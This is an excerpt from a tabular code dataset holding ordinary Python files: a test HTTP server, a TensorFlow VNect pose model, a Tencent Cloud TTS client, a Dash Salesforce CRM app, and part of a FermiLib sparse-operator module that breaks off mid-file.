max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars)
---|---|---|---|---
tests/server.py | nickanna42/sprite.js | 181 | 100404 |
import SimpleHTTPServer
import SocketServer
import os
PORT = 8000
class Allow(SimpleHTTPServer.SimpleHTTPRequestHandler):
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
if ctype.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
try:
f = open(path, mode)
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
self.send_header("Access-Control-Allow-Origin", "*")
if path.endswith("png") or path.endswith("gif") or path.endswith("jpg"):
# 2 minutes cache
self.send_header("Cache-Control", "max-age=120");
self.end_headers()
return f
SocketServer.ThreadingTCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer(("", PORT), Allow)
print "serving at port", PORT
httpd.serve_forever()
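The handler above is Python 2 code (SimpleHTTPServer, SocketServer and a print statement). A minimal Python 3 sketch of the same idea, overriding end_headers to inject the CORS and cache headers, might look like the following; the port and cache policy mirror the script above, while the rest is an assumption rather than part of the original repository.

import http.server

PORT = 8000

class AllowCORS(http.server.SimpleHTTPRequestHandler):
    def end_headers(self):
        # Same headers as the Python 2 handler above.
        self.send_header("Access-Control-Allow-Origin", "*")
        if self.path.endswith((".png", ".gif", ".jpg")):
            self.send_header("Cache-Control", "max-age=120")  # 2 minutes cache
        super().end_headers()

if __name__ == "__main__":
    with http.server.ThreadingHTTPServer(("", PORT), AllowCORS) as httpd:
        print("serving at port", PORT)
        httpd.serve_forever()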
src/vnect_model.py | Pandinosaurus/VNect | 220 | 100413 |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Reference:
# https://github.com/timctho/VNect-tensorflow
# https://github.com/EJShim/vnect_estimator
import tensorflow as tf
import tensorflow.contrib as tc
import numpy as np
import pickle
# in tf.layers.conv2d: default_weight_name = kernel, default_bias_name = bias
# in tc.layers.conv2d: default_weight_name = weights, default_bias_name = biases
class VNect:
def __init__(self):
self.is_training = False
self.input_holder = tf.placeholder(dtype=tf.float32, shape=(None, 368, 368, 3))
self._build_network()
def _build_network(self):
# Conv
self.conv1 = tc.layers.conv2d(self.input_holder, kernel_size=7, padding='same', num_outputs=64, stride=2,
scope='conv1')
self.pool1 = tc.layers.max_pool2d(self.conv1, kernel_size=3, padding='same', scope='pool1')
# Residual block 2a
self.res2a_branch1 = tc.layers.conv2d(self.pool1, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2a_branch1')
self.res2a_branch2a = tc.layers.conv2d(self.pool1, kernel_size=1, padding='valid', num_outputs=64,
scope='res2a_branch2a')
self.res2a_branch2b = tc.layers.conv2d(self.res2a_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2a_branch2b')
self.res2a_branch2c = tc.layers.conv2d(self.res2a_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2a_branch2c')
self.res2a = tf.add(self.res2a_branch2c, self.res2a_branch1, name='res2a_add')
self.res2a = tf.nn.relu(self.res2a, name='res2a')
# Residual block 2b
self.res2b_branch2a = tc.layers.conv2d(self.res2a, kernel_size=1, padding='valid', num_outputs=64,
scope='res2b_branch2a')
self.res2b_branch2b = tc.layers.conv2d(self.res2b_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2b_branch2b')
self.res2b_branch2c = tc.layers.conv2d(self.res2b_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2b_branch2c')
self.res2b = tf.add(self.res2b_branch2c, self.res2a, name='res2b_add')
self.res2b = tf.nn.relu(self.res2b, name='res2b')
# Residual block 2c
self.res2c_branch2a = tc.layers.conv2d(self.res2b, kernel_size=1, padding='valid', num_outputs=64,
scope='res2c_branch2a')
        self.res2c_branch2b = tc.layers.conv2d(self.res2c_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2c_branch2b')
self.res2c_branch2c = tc.layers.conv2d(self.res2c_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2c_branch2c')
self.res2c = tf.add(self.res2c_branch2c, self.res2b, name='res2c_add')
self.res2c = tf.nn.relu(self.res2c, name='res2c')
# Residual block 3a
self.res3a_branch1 = tc.layers.conv2d(self.res2c, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, stride=2, scope='res3a_branch1')
self.res3a_branch2a = tc.layers.conv2d(self.res2c, kernel_size=1, padding='valid', num_outputs=128, stride=2,
scope='res3a_branch2a')
self.res3a_branch2b = tc.layers.conv2d(self.res3a_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3a_branch2b')
self.res3a_branch2c = tc.layers.conv2d(self.res3a_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3a_branch2c')
self.res3a = tf.add(self.res3a_branch2c, self.res3a_branch1, name='res3a_add')
self.res3a = tf.nn.relu(self.res3a, name='res3a')
# Residual block 3b
self.res3b_branch2a = tc.layers.conv2d(self.res3a, kernel_size=1, padding='valid', num_outputs=128,
scope='res3b_branch2a')
self.res3b_branch2b = tc.layers.conv2d(self.res3b_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3b_branch2b')
self.res3b_branch2c = tc.layers.conv2d(self.res3b_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3b_branch2c')
self.res3b = tf.add(self.res3b_branch2c, self.res3a, name='res3b_add')
self.res3b = tf.nn.relu(self.res3b, name='res3b')
# Residual block 3c
self.res3c_branch2a = tc.layers.conv2d(self.res3b, kernel_size=1, padding='valid', num_outputs=128,
scope='res3c_branch2a')
self.res3c_branch2b = tc.layers.conv2d(self.res3c_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3c_branch2b')
self.res3c_branch2c = tc.layers.conv2d(self.res3c_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3c_branch2c')
self.res3c = tf.add(self.res3c_branch2c, self.res3b, name='res3c_add')
self.res3c = tf.nn.relu(self.res3c, name='res3c')
# Residual block 3d
self.res3d_branch2a = tc.layers.conv2d(self.res3c, kernel_size=1, padding='valid', num_outputs=128,
scope='res3d_branch2a')
self.res3d_branch2b = tc.layers.conv2d(self.res3d_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3d_branch2b')
self.res3d_branch2c = tc.layers.conv2d(self.res3d_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3d_branch2c')
self.res3d = tf.add(self.res3d_branch2c, self.res3c, name='res3d_add')
self.res3d = tf.nn.relu(self.res3d, name='res3d')
# Residual block 4a
self.res4a_branch1 = tc.layers.conv2d(self.res3d, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, stride=2, scope='res4a_branch1')
self.res4a_branch2a = tc.layers.conv2d(self.res3d, kernel_size=1, padding='valid', num_outputs=256, stride=2,
scope='res4a_branch2a')
self.res4a_branch2b = tc.layers.conv2d(self.res4a_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4a_branch2b')
self.res4a_branch2c = tc.layers.conv2d(self.res4a_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4a_branch2c')
self.res4a = tf.add(self.res4a_branch2c, self.res4a_branch1, name='res4a_add')
self.res4a = tf.nn.relu(self.res4a, name='res4a')
# Residual block 4b
self.res4b_branch2a = tc.layers.conv2d(self.res4a, kernel_size=1, padding='valid', num_outputs=256,
scope='res4b_branch2a')
self.res4b_branch2b = tc.layers.conv2d(self.res4b_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4b_branch2b')
self.res4b_branch2c = tc.layers.conv2d(self.res4b_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4b_branch2c')
self.res4b = tf.add(self.res4b_branch2c, self.res4a, name='res4b_add')
self.res4b = tf.nn.relu(self.res4b, name='res4b')
# Residual block 4c
self.res4c_branch2a = tc.layers.conv2d(self.res4b, kernel_size=1, padding='valid', num_outputs=256,
scope='res4c_branch2a')
self.res4c_branch2b = tc.layers.conv2d(self.res4c_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4c_branch2b')
self.res4c_branch2c = tc.layers.conv2d(self.res4c_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4c_branch2c')
self.res4c = tf.add(self.res4c_branch2c, self.res4b, name='res4c_add')
self.res4c = tf.nn.relu(self.res4c, name='res4c')
# Residual block 4d
self.res4d_branch2a = tc.layers.conv2d(self.res4c, kernel_size=1, padding='valid', num_outputs=256,
scope='res4d_branch2a')
self.res4d_branch2b = tc.layers.conv2d(self.res4d_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4d_branch2b')
self.res4d_branch2c = tc.layers.conv2d(self.res4d_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4d_branch2c')
self.res4d = tf.add(self.res4d_branch2c, self.res4c, name='res4d_add')
self.res4d = tf.nn.relu(self.res4d, name='res4d')
# Residual block 4e
self.res4e_branch2a = tc.layers.conv2d(self.res4d, kernel_size=1, padding='valid', num_outputs=256,
scope='res4e_branch2a')
self.res4e_branch2b = tc.layers.conv2d(self.res4e_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4e_branch2b')
self.res4e_branch2c = tc.layers.conv2d(self.res4e_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4e_branch2c')
self.res4e = tf.add(self.res4e_branch2c, self.res4d, name='res4e_add')
self.res4e = tf.nn.relu(self.res4e, name='res4e')
# Residual block 4f
self.res4f_branch2a = tc.layers.conv2d(self.res4e, kernel_size=1, padding='valid', num_outputs=256,
scope='res4f_branch2a')
self.res4f_branch2b = tc.layers.conv2d(self.res4f_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4f_branch2b')
self.res4f_branch2c = tc.layers.conv2d(self.res4f_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4f_branch2c')
self.res4f = tf.add(self.res4f_branch2c, self.res4e, name='res4f_add')
self.res4f = tf.nn.relu(self.res4f, name='res4f')
# Residual block 5a
self.res5a_branch2a_new = tc.layers.conv2d(self.res4f, kernel_size=1, padding='valid', num_outputs=512,
scope='res5a_branch2a_new')
self.res5a_branch2b_new = tc.layers.conv2d(self.res5a_branch2a_new, kernel_size=3, padding='same',
num_outputs=512, scope='res5a_branch2b_new')
self.res5a_branch2c_new = tc.layers.conv2d(self.res5a_branch2b_new, kernel_size=1, padding='valid',
num_outputs=1024, activation_fn=None, scope='res5a_branch2c_new')
self.res5a_branch1_new = tc.layers.conv2d(self.res4f, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res5a_branch1_new')
self.res5a = tf.add(self.res5a_branch2c_new, self.res5a_branch1_new, name='res5a_add')
self.res5a = tf.nn.relu(self.res5a, name='res5a')
# Residual block 5b
self.res5b_branch2a_new = tc.layers.conv2d(self.res5a, kernel_size=1, padding='valid', num_outputs=256,
scope='res5b_branch2a_new')
self.res5b_branch2b_new = tc.layers.conv2d(self.res5b_branch2a_new, kernel_size=3, padding='same',
num_outputs=128, scope='res5b_branch2b_new')
self.res5b_branch2c_new = tc.layers.conv2d(self.res5b_branch2b_new, kernel_size=1, padding='valid',
num_outputs=256, scope='res5b_branch2c_new')
# Transpose Conv
self.res5c_branch1a = tf.layers.conv2d_transpose(self.res5b_branch2c_new, kernel_size=4, filters=63,
activation=None, strides=2, padding='same', use_bias=False,
name='res5c_branch1a')
self.res5c_branch2a = tf.layers.conv2d_transpose(self.res5b_branch2c_new, kernel_size=4, filters=128,
activation=None, strides=2, padding='same', use_bias=False,
name='res5c_branch2a')
self.bn5c_branch2a = tc.layers.batch_norm(self.res5c_branch2a, scale=True, is_training=self.is_training,
scope='bn5c_branch2a')
self.bn5c_branch2a = tf.nn.relu(self.bn5c_branch2a)
self.res5c_delta_x, self.res5c_delta_y, self.res5c_delta_z = tf.split(self.res5c_branch1a, num_or_size_splits=3,
axis=3)
self.res5c_branch1a_sqr = tf.multiply(self.res5c_branch1a, self.res5c_branch1a, name='res5c_branch1a_sqr')
self.res5c_delta_x_sqr, self.res5c_delta_y_sqr, self.res5c_delta_z_sqr = tf.split(self.res5c_branch1a_sqr,
num_or_size_splits=3, axis=3)
self.res5c_bone_length_sqr = tf.add(tf.add(self.res5c_delta_x_sqr, self.res5c_delta_y_sqr),
self.res5c_delta_z_sqr)
self.res5c_bone_length = tf.sqrt(self.res5c_bone_length_sqr)
self.res5c_branch2a_feat = tf.concat(
[self.bn5c_branch2a, self.res5c_delta_x, self.res5c_delta_y, self.res5c_delta_z, self.res5c_bone_length],
axis=3, name='res5c_branch2a_feat')
self.res5c_branch2b = tc.layers.conv2d(self.res5c_branch2a_feat, kernel_size=3, padding='same', num_outputs=128,
scope='res5c_branch2b')
self.res5c_branch2c = tf.layers.conv2d(self.res5c_branch2b, kernel_size=1, padding='valid', filters=84,
activation=None, use_bias=False, name='res5c_branch2c')
# print(self.res5c_branch2c.get_shape())
self.heatmap, self.x_heatmap, self.y_heatmap, self.z_heatmap = tf.split(self.res5c_branch2c,
num_or_size_splits=4, axis=3)
def load_weights(self, sess, params_file):
# Read pretrained model file
model_weights = pickle.load(open(params_file, 'rb'))
# For each layer each var
with tf.variable_scope('', reuse=True):
for variable in tf.global_variables():
var_name = variable.name.split(':')[0]
# print(var_name)
self.assign_weights_from_dict(var_name, model_weights, sess)
@staticmethod
def assign_weights_from_dict(var_name, model_weights, sess):
with tf.variable_scope('', reuse=True):
var_tf = tf.get_variable(var_name)
print('assigning', var_tf)
sess.run(tf.assign(var_tf, model_weights[var_name]))
np.testing.assert_allclose(var_tf.eval(sess), model_weights[var_name])
if __name__ == '__main__':
model = VNect()
print('VNect building successfully.')
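A rough inference sketch for the graph built above, using the TensorFlow 1.x session API the module targets; the weight-file path and the all-zeros input frame are placeholders chosen for illustration, not values from the repository.

import numpy as np
import tensorflow as tf

model = VNect()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    model.load_weights(sess, 'vnect_weights.pkl')  # hypothetical weights file
    frame = np.zeros((1, 368, 368, 3), dtype=np.float32)  # stand-in input image
    heatmap, x_hm, y_hm, z_hm = sess.run(
        [model.heatmap, model.x_heatmap, model.y_heatmap, model.z_heatmap],
        feed_dict={model.input_holder: frame})
    print(heatmap.shape)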
tencentcloud/tts/v20190823/tts_client.py | PlasticMem/tencentcloud-sdk-python | 465 | 100506 |
# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.tts.v20190823 import models
class TtsClient(AbstractClient):
_apiVersion = '2019-08-23'
_endpoint = 'tts.tencentcloudapi.com'
_service = 'tts'
def CreateTtsTask(self, request):
"""本接口服务对10万字符以内的文本进行语音合成,异步返回音频结果。满足一次性合成较长文本的客户需求,如阅读播报、新闻媒体等场景。
<li>支持音频格式:mp3,wav,pcm</li>
<li>支持音频采样率:16000 Hz, 8000 Hz</li>
<li>支持中文普通话、英文、中英文混读、粤语合成</li>
<li>支持语速、音量设置</li>
<li>支持回调或轮询的方式获取结果,结果获取请参考 长文本语音合成结果查询。</li>
<li>长文本语音合成任务完成后,合成音频结果在服务端可保存24小时</li>
:param request: Request instance for CreateTtsTask.
:type request: :class:`tencentcloud.tts.v20190823.models.CreateTtsTaskRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.CreateTtsTaskResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTtsTask", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTtsTaskResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeTtsTaskStatus(self, request):
"""在调用长文本语音合成请求接口后,有回调和轮询两种方式获取识别结果。
<li>当采用回调方式时,合成完毕后会将结果通过 POST 请求的形式通知到用户在请求时填写的回调 URL,具体请参见 长文本语音合成结果查询 。</li>
<li>当采用轮询方式时,需要主动提交任务ID来轮询识别结果,共有任务成功、等待、执行中和失败四种结果,具体信息请参见下文说明。</li>
:param request: Request instance for DescribeTtsTaskStatus.
:type request: :class:`tencentcloud.tts.v20190823.models.DescribeTtsTaskStatusRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.DescribeTtsTaskStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeTtsTaskStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeTtsTaskStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def TextToVoice(self, request):
"""腾讯云语音合成技术(TTS)可以将任意文本转化为语音,实现让机器和应用张口说话。
腾讯TTS技术可以应用到很多场景,比如,移动APP语音播报新闻;智能设备语音提醒;依靠网上现有节目或少量录音,快速合成明星语音,降低邀约成本;支持车载导航语音合成的个性化语音播报。
内测期间免费使用。
:param request: Request instance for TextToVoice.
:type request: :class:`tencentcloud.tts.v20190823.models.TextToVoiceRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.TextToVoiceResponse`
"""
try:
params = request._serialize()
body = self.call("TextToVoice", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.TextToVoiceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
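A short usage sketch for the synchronous TextToVoice call, following the SDK's usual credential/region/request pattern; the credentials, region and request fields below are illustrative assumptions, not values taken from this file.

import json
from tencentcloud.common import credential
from tencentcloud.tts.v20190823 import tts_client, models

cred = credential.Credential("YOUR_SECRET_ID", "YOUR_SECRET_KEY")  # placeholder keys
client = tts_client.TtsClient(cred, "ap-guangzhou")  # assumed region

req = models.TextToVoiceRequest()
req.from_json_string(json.dumps({"Text": "hello world", "SessionId": "session-1"}))

resp = client.TextToVoice(req)
print(resp.to_json_string())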
apps/dash-salesforce-crm/index.py | JeroenvdSande/dash-sample-apps | 2,332 | 100563 |
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import sf_manager, app
from panels import opportunities, cases, leads
server = app.server
app.layout = html.Div(
[
html.Div(
className="row header",
children=[
html.Button(id="menu", children=dcc.Markdown("≡")),
html.Span(
className="app-title",
children=[
dcc.Markdown("**CRM App**"),
html.Span(
id="subtitle",
children=dcc.Markdown("  using Salesforce API"),
style={"font-size": "1.8rem", "margin-top": "15px"},
),
],
),
html.Img(src=app.get_asset_url("logo.png")),
html.A(
id="learn_more",
children=html.Button("Learn More"),
href="https://plot.ly/dash/",
),
],
),
html.Div(
id="tabs",
className="row tabs",
children=[
dcc.Link("Opportunities", href="/"),
dcc.Link("Leads", href="/"),
dcc.Link("Cases", href="/"),
],
),
html.Div(
id="mobile_tabs",
className="row tabs",
style={"display": "none"},
children=[
dcc.Link("Opportunities", href="/"),
dcc.Link("Leads", href="/"),
dcc.Link("Cases", href="/"),
],
),
dcc.Store( # opportunities df
id="opportunities_df",
data=sf_manager.get_opportunities().to_json(orient="split"),
),
dcc.Store( # leads df
id="leads_df", data=sf_manager.get_leads().to_json(orient="split")
),
dcc.Store(
id="cases_df", data=sf_manager.get_cases().to_json(orient="split")
), # cases df
dcc.Location(id="url", refresh=False),
html.Div(id="tab_content"),
html.Link(
href="https://use.fontawesome.com/releases/v5.2.0/css/all.css",
rel="stylesheet",
),
html.Link(
href="https://fonts.googleapis.com/css?family=Dosis", rel="stylesheet"
),
html.Link(
href="https://fonts.googleapis.com/css?family=Open+Sans", rel="stylesheet"
),
html.Link(
href="https://fonts.googleapis.com/css?family=Ubuntu", rel="stylesheet"
),
],
className="row",
style={"margin": "0%"},
)
# Update the index
@app.callback(
[
Output("tab_content", "children"),
Output("tabs", "children"),
Output("mobile_tabs", "children"),
],
[Input("url", "pathname")],
)
def display_page(pathname):
tabs = [
dcc.Link("Opportunities", href="/dash-salesforce-crm/opportunities"),
dcc.Link("Leads", href="/dash-salesforce-crm/leads"),
dcc.Link("Cases", href="/dash-salesforce-crm/cases"),
]
if pathname == "/dash-salesforce-crm/opportunities":
tabs[0] = dcc.Link(
dcc.Markdown("**■ Opportunities**"),
href="/dash-salesforce-crm/opportunities",
)
return opportunities.layout, tabs, tabs
elif pathname == "/dash-salesforce-crm/cases":
tabs[2] = dcc.Link(
dcc.Markdown("**■ Cases**"), href="/dash-salesforce-crm/cases"
)
return cases.layout, tabs, tabs
tabs[1] = dcc.Link(
dcc.Markdown("**■ Leads**"), href="/dash-salesforce-crm/leads"
)
return leads.layout, tabs, tabs
@app.callback(
Output("mobile_tabs", "style"),
[Input("menu", "n_clicks")],
[State("mobile_tabs", "style")],
)
def show_menu(n_clicks, tabs_style):
if n_clicks:
if tabs_style["display"] == "none":
tabs_style["display"] = "flex"
else:
tabs_style["display"] = "none"
return tabs_style
if __name__ == "__main__":
app.run_server(debug=True)
src/fermilib/utils/_sparse_tools.py | ProjectQ-Framework/FermiLib | 102 | 100572 |
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides functions to interface with scipy.sparse."""
from __future__ import absolute_import
from functools import reduce
from future.utils import iteritems
import itertools
import numpy
import numpy.linalg
import scipy
import scipy.sparse
import scipy.sparse.linalg
from fermilib.config import *
from fermilib.ops import FermionOperator, hermitian_conjugated, normal_ordered
from fermilib.utils import fourier_transform, Grid
from fermilib.utils._jellium import (momentum_vector, position_vector,
grid_indices)
from projectq.ops import QubitOperator
# Make global definitions.
identity_csc = scipy.sparse.identity(2, format='csr', dtype=complex)
pauli_x_csc = scipy.sparse.csc_matrix([[0., 1.], [1., 0.]], dtype=complex)
pauli_y_csc = scipy.sparse.csc_matrix([[0., -1.j], [1.j, 0.]], dtype=complex)
pauli_z_csc = scipy.sparse.csc_matrix([[1., 0.], [0., -1.]], dtype=complex)
q_raise_csc = (pauli_x_csc - 1.j * pauli_y_csc) / 2.
q_lower_csc = (pauli_x_csc + 1.j * pauli_y_csc) / 2.
pauli_matrix_map = {'I': identity_csc, 'X': pauli_x_csc,
'Y': pauli_y_csc, 'Z': pauli_z_csc}
def wrapped_kronecker(operator_1, operator_2):
"""Return the Kronecker product of two sparse.csc_matrix operators."""
return scipy.sparse.kron(operator_1, operator_2, 'csc')
def kronecker_operators(*args):
"""Return the Kronecker product of multiple sparse.csc_matrix operators."""
return reduce(wrapped_kronecker, *args)
def jordan_wigner_ladder_sparse(n_qubits, tensor_factor, ladder_type):
"""Make a matrix representation of a fermion ladder operator.
Args:
        n_qubits(int): Number of qubits in the system Hilbert space.
        tensor_factor(int): Tensor factor (qubit index) on which the
            ladder operator acts.
        ladder_type(int): 1 for a raising (creation) operator, 0 for a
            lowering (annihilation) operator.
Returns:
The corresponding SparseOperator.
"""
identities = [scipy.sparse.identity(
2 ** tensor_factor, dtype=complex, format='csc')]
parities = (n_qubits - tensor_factor - 1) * [pauli_z_csc]
if ladder_type:
operator = kronecker_operators(identities + [q_raise_csc] + parities)
else:
operator = kronecker_operators(identities + [q_lower_csc] + parities)
return operator
def jordan_wigner_sparse(fermion_operator, n_qubits=None):
"""Initialize a SparseOperator from a FermionOperator.
Args:
fermion_operator(FermionOperator): instance of the FermionOperator
class.
n_qubits(int): Number of qubits.
Returns:
The corresponding SparseOperator.
"""
if n_qubits is None:
from fermilib.utils import count_qubits
n_qubits = count_qubits(fermion_operator)
# Create a list of raising and lowering operators for each orbital.
jw_operators = []
for tensor_factor in range(n_qubits):
jw_operators += [(jordan_wigner_ladder_sparse(n_qubits,
tensor_factor,
0),
jordan_wigner_ladder_sparse(n_qubits,
tensor_factor,
1))]
# Construct the SparseOperator.
n_hilbert = 2 ** n_qubits
values_list = [[]]
row_list = [[]]
column_list = [[]]
for term in fermion_operator.terms:
coefficient = fermion_operator.terms[term]
sparse_matrix = coefficient * scipy.sparse.identity(
2 ** n_qubits, dtype=complex, format='csc')
for ladder_operator in term:
sparse_matrix = sparse_matrix * jw_operators[
ladder_operator[0]][ladder_operator[1]]
if coefficient:
# Extract triplets from sparse_term.
sparse_matrix = sparse_matrix.tocoo(copy=False)
values_list.append(sparse_matrix.data)
(row, column) = sparse_matrix.nonzero()
row_list.append(row)
column_list.append(column)
values_list = numpy.concatenate(values_list)
row_list = numpy.concatenate(row_list)
column_list = numpy.concatenate(column_list)
sparse_operator = scipy.sparse.coo_matrix((
values_list, (row_list, column_list)),
shape=(n_hilbert, n_hilbert)).tocsc(copy=False)
sparse_operator.eliminate_zeros()
return sparse_operator
def qubit_operator_sparse(qubit_operator, n_qubits=None):
"""Initialize a SparseOperator from a QubitOperator.
Args:
qubit_operator(QubitOperator): instance of the QubitOperator class.
n_qubits (int): Number of qubits.
Returns:
The corresponding SparseOperator.
"""
from fermilib.utils import count_qubits
if n_qubits is None:
n_qubits = count_qubits(qubit_operator)
if n_qubits < count_qubits(qubit_operator):
raise ValueError('Invalid number of qubits specified.')
# Construct the SparseOperator.
n_hilbert = 2 ** n_qubits
values_list = [[]]
row_list = [[]]
column_list = [[]]
# Loop through the terms.
for qubit_term in qubit_operator.terms:
tensor_factor = 0
coefficient = qubit_operator.terms[qubit_term]
sparse_operators = [coefficient]
for pauli_operator in qubit_term:
# Grow space for missing identity operators.
if pauli_operator[0] > tensor_factor:
identity_qubits = pauli_operator[0] - tensor_factor
identity = scipy.sparse.identity(
2 ** identity_qubits, dtype=complex, format='csc')
sparse_operators += [identity]
# Add actual operator to the list.
sparse_operators += [pauli_matrix_map[pauli_operator[1]]]
tensor_factor = pauli_operator[0] + 1
# Grow space at end of string unless operator acted on final qubit.
if tensor_factor < n_qubits or not qubit_term:
identity_qubits = n_qubits - tensor_factor
identity = scipy.sparse.identity(
2 ** identity_qubits, dtype=complex, format='csc')
sparse_operators += [identity]
# Extract triplets from sparse_term.
sparse_matrix = kronecker_operators(sparse_operators)
values_list.append(sparse_matrix.tocoo(copy=False).data)
(column, row) = sparse_matrix.nonzero()
column_list.append(column)
row_list.append(row)
# Create sparse operator.
values_list = numpy.concatenate(values_list)
row_list = numpy.concatenate(row_list)
column_list = numpy.concatenate(column_list)
sparse_operator = scipy.sparse.coo_matrix((
values_list, (row_list, column_list)),
shape=(n_hilbert, n_hilbert)).tocsc(copy=False)
sparse_operator.eliminate_zeros()
return sparse_operator
def jw_hartree_fock_state(n_electrons, n_orbitals):
"""Function to product Hartree-Fock state in JW representation."""
occupied = scipy.sparse.csr_matrix([[0], [1]], dtype=float)
psi = 1.
unoccupied = scipy.sparse.csr_matrix([[1], [0]], dtype=float)
for orbital in range(n_electrons):
psi = scipy.sparse.kron(psi, occupied, 'csr')
for orbital in range(n_orbitals - n_electrons):
psi = scipy.sparse.kron(psi, unoccupied, 'csr')
return psi
def jw_number_indices(n_electrons, n_qubits):
"""Return the indices for n_electrons in n_qubits under JW encoding
Calculates the indices for all possible arrangements of n-electrons
within n-qubit orbitals when a Jordan-Wigner encoding is used.
Useful for restricting generic operators or vectors to a particular
particle number space when desired
Args:
n_electrons(int): Number of particles to restrict the operator to
n_qubits(int): Number of qubits defining the total state
Returns:
indices(list): List of indices in a 2^n length array that indicate
the indices of constant particle number within n_qubits
in a Jordan-Wigner encoding.
"""
occupations = itertools.combinations(range(n_qubits), n_electrons)
indices = [sum([2**n for n in occupation])
for occupation in occupations]
return indices
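# For instance, jw_number_indices(2, 4) walks the occupations
# (0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3) and returns
# [3, 5, 9, 6, 10, 12], i.e. the basis states 0011, 0101, 1001,
# 0110, 1010 and 1100 (qubit 0 being the least significant bit).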
def jw_number_restrict_operator(operator, n_electrons, n_qubits=None):
"""Restrict a Jordan-Wigner encoded operator to a given particle number
Args:
